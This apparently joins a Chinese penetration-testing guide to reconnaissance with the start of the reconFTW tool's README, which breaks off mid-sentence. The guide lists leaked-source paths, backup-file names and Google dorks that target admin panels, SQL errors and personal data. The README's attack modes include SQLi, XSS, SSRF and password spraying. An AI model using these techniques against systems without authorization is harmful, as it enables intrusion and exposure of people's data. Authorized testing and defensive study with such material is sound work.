![](img/1594459-20200119152155149-1636869790.png) ## 浏览器插件 通过Google、FireFox等插件的使用,收集网站结构信息 ### Wappalyzer ![](img/1594459-20200119142916899-799352136.png) # 收集敏感信息 ## WAF识别 识别网站使用的什么WAF,可以去找相应的绕过手段 ### wafw00f 项目地址:https://github.com/EnableSecurity/wafw00f ![](img/1594459-20200119142930233-1332790706.png) ## 源码泄露 ### 常见源码泄露 ``` /.bzr/ /CVS/Entries /CVS/Root /.DS_Store MacOS自动生成 /.hg/ /.svn/ (/.svn/entries) /.git/ /WEB-INF/src/ /WEB-INF/lib/ /WEB-INF/classes/ /WEB-INF/database.properties /WEB-INF/web.xml Robots.txt ``` 上述源码泄露在Github上都可以找到相应的利用工具 ### 源码泄露扫描工具 将常见源码泄露加入字典配合FUZZ、御剑等扫描器进行扫描收集 ### 源码泄露利用工具 .git源码泄露:https://github.com/lijiejie/GitHack .DS_Store泄露:https://github.com/lijiejie/ds_store_exp .bzr、CVS、.svn、.hg源码泄露:https://github.com/kost/dvcs-ripper ## 备份文件泄露 ### 网站备份文件泄露常见名称 ``` backup db data web wwwroot database www code test admin user sql ``` ### 网站备份文件泄露常见后缀 ``` .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar ``` ### 网站备份文件泄露扫描工具 常见扫描工具有:Test404网站备份文件扫描器 v2.0、ihoneyBakFileScan等 ihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具,根据域名自动生成相关扫描字典,自动记录扫描成功的备份地址到文件 ![](img/1594459-20200119142945747-1732902549.png) ## Google Hacking ### 常用GoogleHacking语法 1、intext:(仅针对Google有效) 把网页中的正文内容中的某个字符作为搜索的条件 2、intitle: 把网页标题中的某个字符作为搜索的条件 3、cache: 搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息 4、filetype/ext: 指定一个格式类型的文件作为搜索对象 5、inurl: 搜索包含指定字符的URL 6、site: 在指定的(域名)站点搜索相关内容 ### 其他GoogleHacking语法 1、引号 '' " 把关键字打上引号后,把引号部分作为整体来搜索 2、or 同时搜索两个或更多的关键字 3、link 搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL 4、info 查找指定站点的一些基本信息 ### GoogleHacking典型用法 - 管理后台地址 ``` site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录 ``` - 上传类漏洞地址 ``` site:target.com inurl:file site:target.com inurl:upload ``` - 注入页面 ``` site:target.com inurl:php?id= ``` - 编辑器页面 ``` site:target.com inurl:ewebeditor ``` - 目录遍历漏洞 ``` site:target.com intitle:index.of ``` - SQL错误 ``` site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:”Warning: pg_connect()" ``` - phpinfo() ``` site:target.com ext:php intitle:phpinfo "published by the PHP Group" ``` - 配置文件泄露 ``` site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini ``` - 数据库文件泄露 ``` site:target.com ext:.sql | .dbf | .mdb | .db ``` - 日志文件泄露 ``` site:target.com ext:.log ``` - 备份和历史文件泄露 ``` site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar ``` - 公开文件泄露 ``` site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv ``` - 邮箱信息 ``` site:target.com intext:@target.com site:target.com 邮件 site:target.com email ``` - 社工信息 ``` site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证 ``` ![](img/1594459-20200119152425254-1738721113.png) ## JS获取敏感接口 ### JSFinder JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。 - 安装 ``` pip3 install requests bs4 git clone https://github.com/Threezh1/JSFinder.git ``` - 使用 ``` python3 JSFinder.py -u http://www.mi.com python3 JSFinder.py -u http://www.mi.com -d ``` ![](img/1594459-20200119152940819-547890202.png) ### LinkFinder 该工具通过网站中的JS文件来发现服务端、敏感信息、隐藏控制面板的URL链接等有用信息,可最大化地提高URL发现效率 - 安装 ``` git clone https://github.com/GerbenJavado/LinkFinder.git cd LinkFinder python2 setup.py install ``` - 使用 在线JavaScript文件中查找端点的最基本用法,并将结果输出到results.html: ``` python linkfinder.py -i https://example.com/1.js -o results.html ``` CLI输出(不使用jsbeautifier,这使得它非常快): ``` pyhon linkfinder.py -i https://example.com/1.js -o cli ``` 分析整个域及其JS文件: ``` python linkfinder.py -i https://example.com -d ``` Burp输入(在目标中选择要保存的文件,右键单击,Save selected items将该文件作为输入): ``` python linkfinder.py -i burpfile -b ``` 枚举JavaScript文件的整个文件夹,同时查找以/ api /开头的终结点,并最终将结果保存到results.html: ``` python linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html ``` ![](img/1594459-20200119153545222-989750205.png) ## 目录&后台扫描 常用工具-自己 ``` 7kbscan-WebPathBrute https://github.com/7kbstorm/7kbscan-WebPathBrute DirMap https://github.com/H4ckForJob/dirmap dirsearch https://github.com/maurosoria/dirsearch Fuzz-gobuster https://github.com/OJ/gobuster Fuzz-dirbuster OWASP kali自带 Fuzz-wfuzz https://github.com/xmendez/wfuzz Test404轻量后台扫描器+v2.0 御剑 ``` 个人比较喜欢使用Fuzz大法,不管是目录扫描、后台扫描、Web漏洞模糊测试都是非常灵活的。这几款fuzz工具都比较好用 ``` 基于Go开发:gobuster 基于Java开发:dirbuster 基于Python开发:wfuzz ``` - dirbuster ![](img/1594459-20200119155315684-2055799224.png) - wfuzz ![](img/1594459-20200119155738473-643631035.png) 工具无论再多再好,没有一个好的字典一切都是空谈。强大字典是需要自己平时慢慢的积累。 ## 越权查询 遍历uid获得身份信息等 ## 代码托管 通过代码托管平台搜索敏感信息(内部邮箱账号密码、数据库账号密码等) - github GitHub是一个面向开源及私有软件项目的托管平台。 平台地址:https://github.com/ GitHub敏感信息泄露一直是企业信息泄露和知识产权泄露的重灾区,安全意识薄弱的同事经常会将公司的代码、各种服务的账户等极度敏感的信息『开源』到github中,github也是黑、白帽子、安全工程师的必争之地。 Github泄露扫描系统开发:https://sec.xiaomi.com/article/37 在GitHub中一般通过搜索网站域名、网站JS路径、网站备案、网站下的技术支持等进行敏感信息查询 ![](img/1594459-20200119162240355-550566948.png) - gitee 平台地址:https://gitee.com/ 码云:开源中国出品的代码托管、协作开发平台。 - gitcafe GitCafe一个基于代码托管服务打造的技术协作与分享平台 ## Whois&备案查询 通过Whois和备案查询得到网站的注册人、手机号、邮箱等(对后续的密码生成和社工很有帮助) ## 公网网盘 公司员工可能把一些内部资料放在了公网网盘,然后被在线云网盘搜索的网站抓取了,我们就可以利用这个来对目标系统进行深入挖掘。 可以利用云网盘搜索工具搜集敏感文件,一般直接输入厂商名字进行搜索 ### 凌风云搜索 地址:https://www.lingfengyun.com/ ![](img/1594459-20200119143019466-1878206759.png) ### 小白盘搜索 地址:https://www.xiaobaipan.com/ ### 大力盘搜索 地址:https://www.dalipan.com/ ### 小不点搜索(微盘) 地址:https://www.xiaoso.net/ ![](img/1594459-20200324083040.png) ### 百度网盘爬取开源工具 地址:https://github.com/gudegg/yunSpider ## 网站截图 对目标网站页面进行截图,通过截图找到敏感页面 ### webscreenshot 基于[`url-to-image`](https://github.com/kimmobrunfeldt/url-to-image/)的网站截图工具 - 安装 ``` git clone https://github.com/maaaaz/webscreenshot.git apt-get update && apt-get -y install phantomjs phantomjs -v Ubuntu 16 中安装 phantomjs 出现 QXcbConnection 问题 export QT_QPA_PLATFORM=offscreen export QT_QPA_FONTDIR=/usr/share/fonts ``` - 使用 ``` cd webscreenshot/ python2.7 webscreenshot.py -i url.txt ``` ![](img/1594459-20200119161002755-701856606.png) ## 获取公开文件 ### snitch Snitch可以针对指定域自动执行信息收集过程。此工具可帮助收集可通过Web搜索引擎找到的指定信息。在渗透测试的早期阶段,它可能非常有用。 - 安装 ``` git clone https://github.com/Smaash/snitch.git ``` - 使用 ``` python2.7 snitch.py -C "site:whitehouse.gov filetype:pdf" -P 100 ``` ![](img/1594459-20200119161531465-1731396088.png) ### Google Hacking ``` site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv ``` ![](img/1594459-20200119161241851-445496927.png) ## 邮箱信息收集 ### Infoga Infoga可从不同的公共源网络(搜索引擎,pgp密钥服务器和shodan)收集电子邮件帐户信息(ip,主机名,国家/地区...)。是一个用法非常简单的工具,但是,对于渗透测试的早期阶段,或者只是为了了解自己公司在互联网上的可见性是非常有效的。 - 安装 ``` git clone https://github.com/m4ll0k/Infoga.git /data/infoga cd /data/infoga pip3 install requests python3 infoga.py ``` - 使用 ``` python3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p' python3 infoga.py --info [email protected] python3 infoga.py --info [email protected] -b ``` ### Google Hacking ``` site:target.com intext:@target.com site:target.com 邮件 site:target.com email ``` ![](img/1594459-20200119161412993-1570311002.png) # 历史漏洞&资产 很多时候去查看目标的历史漏洞和资产信息,往往能够得到很多有价值的信息。 ## 历史漏洞 - 乌云漏洞库 平台地址:`https://github.com/hanc00l/wooyun_public` - Exploit-db 平台地址:`https://www.exploit-db.com/` - Securityfocus 平台地址:`https://www.securityfocus.com/bid` - Cxsecurity 平台地址:`https://cxsecurity.com/exploit/` - 国家信息安全漏洞库 平台地址:`http://www.cnnvd.org.cn/` - Seebug 平台地址:`https://www.seebug.org/` 等。。。 ## 历史资产 ### wayback wayback会记录网站版本更迭,可以获取到之前版本的网站,可能会找到一些后来删除的敏感资产信息,或者一些漏洞 平台地址:`https://web.archive.org/` 例如:腾讯2003.09.29的主页 ![](img/1594459-20200324091903.png)
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.1.4"> <img src="https://img.shields.io/badge/release-v2.1.4-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker container 🐳 (2 options)](#b-docker-container--2-options) - [1) From DockerHub](#1-from-dockerhub) - [2) From repository](#2-from-repository) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [You can support this work buying me a coffee:](#you-can-support-this-work-buying-me-a-coffee) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker container 🐳 (2 options) - Docker parameters usage ``` bash -d -> Detached -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -> Share CFG with the Docker -v $PWD/Recon/:/root/Tools/reconftw/Recon/ -> Share output folder with the Host --name reconftwSCAN -> Docker name --rm -> Automatically remove the container when it exits '-d target.com -r' -> reconftw parameters ``` ### 1) From [DockerHub](https://hub.docker.com/r/six2dez/reconftw) ```bash docker pull six2dez/reconftw:main # Download and configure CFG file wget https://raw.githubusercontent.com/six2dez/reconftw/main/reconftw.cfg mkdir Recon docker run -d -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm six2dez/reconftw:main -d target.com -r ``` ### 2) From repository ```bash git clone https://github.com/six2dez/reconftw cd reconftw docker buildx build -t reconftw Docker/. # Running from reconftw root folder, configure values properly for your needs docker run -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm reconftw -d target.com -r ``` #### You can also choose to configure a locale at build time ``` docker buildx build --build-arg LANG=es_ES.UTF-8 --build-arg LANGUAGE=es_ES -t reconftw Docker/. ``` # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) update_resolvers=true proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define #SUBFINDER_CONFIG=~/.config/subfinder/config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens #CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #UDORK_COOKIE="c_user=XXXXXXXXXX; xs=XXXXXXXXXXXXXX" #SHODAN_API_KEY="XXXXXXXXXXXXX" #WHOISXML_API="XXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #findomain_virustotal_token="XXXXXXXXXXXXXXXXX" #findomain_spyse_token="XXXXXXXXXXXXXXXXX" #findomain_securitytrails_token="XXXXXXXXXXXXXXXXX" #findomain_fb_token="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true GOOGLE_DORKS=true GITHUB_DORKS=true METADATA=true EMAILS=true DOMAIN_INFO=true IP_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003" # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CLOUD_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true PASSWORD_DICT=true PASSWORD_MIN_LENGTH=5 PASSWORD_MAX_LENGTH=14 # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DEEP_LIMIT2=1500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans FFUF_FLAGS="-mc all -fc 404 -ac -sf -s" # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=50 GITDORKER_THREADS=5 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 GAUPLUS_THREADS=10 DNSTAKE_THREADS=100 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 PUREDNS_WILDCARDTEST_LIMIT=30 PUREDNS_WILDCARDBATCH_LIMIT=1500000 WEBSCREENSHOT_THREADS=200 GOWITNESS_THREADS=8 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 DNSVALIDATOR_THREADS=200 INTERLACE_THREADS=10 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) # AXIOM=false Uncomment only to overwrite command line flags AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=5 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments #AXIOM_EXTRA_ARGS="--rm-logs" # Example # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME="user" BBRF_PASSWORD="password" # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' byellow='\033[1;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' yellow='\033[0;33m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information parser ([domainbigdata](https://domainbigdata.com/)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester), [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([uDork](https://github.com/m3n0sd0n4ld/uDork)) - Github Dorks ([GitDorker](https://github.com/obheda12/GitDorker)) ## Subdomains - Passive ([subfinder](https://github.com/projectdiscovery/subfinder), [assetfinder](https://github.com/tomnomnom/assetfinder), [amass](https://github.com/OWASP/Amass), [findomain](https://github.com/Findomain/Findomain), [crobat](https://github.com/cgboal/sonarsearch), [waybackurls](https://github.com/tomnomnom/waybackurls), [github-subdomains](https://github.com/gwen001/github-subdomains), [Anubis](https://jldc.me), [gau](https://github.com/lc/gau)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr), [tls.bufferover](tls.bufferover.run) and [dns.bufferover](dns.bufferover.run))) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dnsrecon](https://github.com/darkoperator/dnsrecon)) ## Hosts - IP and subdomains WAF checker ([cf-check](https://github.com/dwisiswant0/cf-check) and [wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [shodan-cli](https://cli.shodan.io/), Subdomains IP resolution with[resolveDomains](https://github.com/Josue87/resolveDomains)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) - Cloud providers check ([clouddetect](https://github.com/99designs/clouddetect)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gauplus](https://github.com/bp0lr/gauplus), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [LinkFinder](https://github.com/GerbenJavado/LinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - S3 bucket finder ([S3Scanner](https://github.com/sa7mon/S3Scanner)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo 